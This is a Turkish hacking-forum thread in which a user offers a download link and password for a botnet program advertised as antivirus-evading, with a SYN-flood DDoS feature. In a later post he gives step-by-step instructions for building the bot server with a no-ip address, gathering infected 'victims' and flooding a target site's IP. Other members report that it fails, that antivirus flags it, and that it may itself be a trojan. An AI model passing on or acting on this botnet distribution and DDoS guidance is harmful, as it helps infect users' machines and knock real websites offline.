Botnet programı

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

felaket639

Üye
4 Nis 2012
95
0
İlk olarak selamun aleykum.

NO-İP ÜZERİNDEN ÇALIŞAN ŞU AN İÇİN FUD OLAN DDOSER SYN FLOOD ÖZELLİĞİ İLE 100 KURBAN İLE BİR ÇOK SİTEYİ KAPATABİLİRSİNİZ KURBAN KAYBETMEMESİ EN ÖNEMLİ ÖZELLİĞİ ÇOK ETKİLİ STABİL HER SİSTEMDE SORUNSUZ ÇALIŞIR.

adszatt.jpg

Link : Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam

Şifre : felakettr639

Bı teşşekür bı yorum esirgemeyin.

qrowlin

Üye
6 Nis 2012
113
0
Tmmda Nasıl Biraz Açıklasan Yarım Saatir Onla Uğraşıyorum İp yazıoyurm Gelmiyo İp

589henry

Üye
7 Ocak 2012
166
0
Felaket kardeşim bı konu açacaksan bılgılerını tam vermen gerekiyor bunu bılıyorsun heralde dme ?

felaket639

Üye
4 Nis 2012
95
0
Sizde sağlam botnet programını bulmusunuz hayla neyın derdındesınız bılmıyosanız kulanmayın zaten kolay kulanımı.

felaket639

Üye
4 Nis 2012
95
0
1- sağ tıklayın builder diyin server oluşturun no-ip adresi yazın bıde açık port unuzu Sonra server oluştur var basın yerını seçın.
2-sağ tıklayın start verın açık portunuzu yazarak
3- Onlınelırınızı seçerek Flood panele gelın ıp adresını yazın sıtenn start dıyın
100 KURBANLA BIR COK SITELERI ÇOKERTIRSINIZ.
Bu kadar.

MyKraL

Yeni üye
30 Mar 2008
4
0
no ip derken neden bahsediorsun kardeş ? no-ip.com adresi felanmı acıklama az

Csr

Yeni üye
9 Nis 2012
32
0
işe yaramıyor video lu paylaşım yaparsan seviniriz yoksa hic paylaşmasan daha makbule gecer

589henry

Üye
7 Ocak 2012
166
0
Bu programı bu adamın dedıgı şekılde yaparsanız [çok özür dilerim ama] boku yersınız adamın botu olursunuz şimdiden ben uyarıyım...

Akyn24

Üye
13 Şub 2012
56
0
Arkadaşım indirmeyi denedim avast öttü. İndirmekten vazgeçtim. tarama sonuçları vs. bir belge varsa indiricem yardımcı olursanız. Tarama sonuçları falan gelene kadar diğer üyelerinde indirmemesini tavsiye ederim.Yuakrıda bot net olabilirsiniz , bu program fake falan yorumları gördüm dikkatli olun.

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.